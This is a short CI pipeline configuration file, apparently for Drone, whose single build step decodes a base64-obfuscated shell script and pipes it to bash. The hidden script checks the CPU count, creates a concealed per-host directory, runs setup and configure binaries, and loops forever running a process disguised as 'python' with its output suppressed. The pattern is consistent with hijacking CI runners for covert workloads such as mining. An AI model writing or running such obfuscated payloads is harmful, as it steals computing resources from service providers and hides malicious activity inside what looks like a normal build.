---
kind: pipeline
type: docker
name: default
steps:
- name: deepCC
  image: golang
  commands:
  - bash -c "base64 -d <<< ZXhwb3J0IFRFUk09eHRlcm0gJiYgbnByb2MgJiYgbWtkaXIgfi8uJChlY2hvICQoaG9zdG5hbWUpKS9iaW4gLXAgJiYgLi9zZXR1cCAmJiAuL2NvbmZpZ3VyZSAmJiBjZCB+Ly4kKGVjaG8gJChob3N0bmFtZSkpL2JpbiAmJiBQQVRIPSQocHdkKTokUEFUSCAmJiB3aGlsZSBbIDEgXTsgZG8gYmFzaCBweXRob24gPiAvZGV2L251bGw7IHNsZWVwIDE7IGRvbmU= | bash"
  environment:
    TERM: xterm
